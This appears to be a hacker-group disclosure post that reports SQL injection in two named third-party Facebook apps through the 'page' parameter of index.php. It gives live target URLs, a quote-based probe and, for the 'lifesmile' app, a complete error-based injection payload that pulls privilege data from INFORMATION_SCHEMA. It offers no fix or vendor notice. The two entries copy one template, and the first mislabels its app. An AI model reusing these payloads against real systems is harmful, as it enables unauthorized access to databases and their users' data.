Facebook - SQL Injection
Details:
========
A remote SQL Injection vulnerability is detected on the Facebook Life Smile
(apps.facebook).
The vulnerability allows an attacker (remote) to inject/execute own sql
statements on the affected fb application dbms.

Vulnerable Module(s):
[+] Life Smile - Facebook 3rd Party
Application

Vulnerable Param(s)/File(s):
[+] index.php

Affected Application:
[+] apps.facebook.com/viewmycalendar/

Sql Error
Example:

http://[APP-SERVER]/[SERVICE-APP]/[FILE].[PHP]?=[SQL Injection]

PoC:

http://apps.facebook.com/viewmycalendar/index.php?page=[SQL-Injection]

Real World Demo :

http://apps.facebook.com/viewmycalendar/index.php?page=1'

----------------------------------------------------------------------

Details:
========
A remote SQL Injection vulnerability is detected on the Facebook Life Smile
(apps.facebook).
The vulnerability allows an attacker (remote) to inject/execute own sql
statements on the affected fb application dbms.

Vulnerable Module(s):
[+] Life Smile - Facebook 3rd Party
Application

Vulnerable Param(s)/File(s):
[+] index.php

Affected Application:
[+] apps.facebook.com/lifesmile/

Sql Error
Example:

http://[APP-SERVER]/[SERVICE-APP]/[FILE].[PHP]?=[SQL Injection]

PoC:

http://apps.facebook.com/lifesmile/index.php?page=[SQL-Injection]

Real World Demo :

http://apps.facebook.com/lifesmile/index.php?page=210 AND (SELECT 1793
FROM(SELECT COUNT(*),CONCAT(0x3a626a7a3a,(SELECT
MID((IFNULL(CAST(privilege_type AS CHAR),0x20)),1,50) FROM
INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT
0,1),0x3a7672703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS
GROUP BY x)a)


by
Ninja-Sec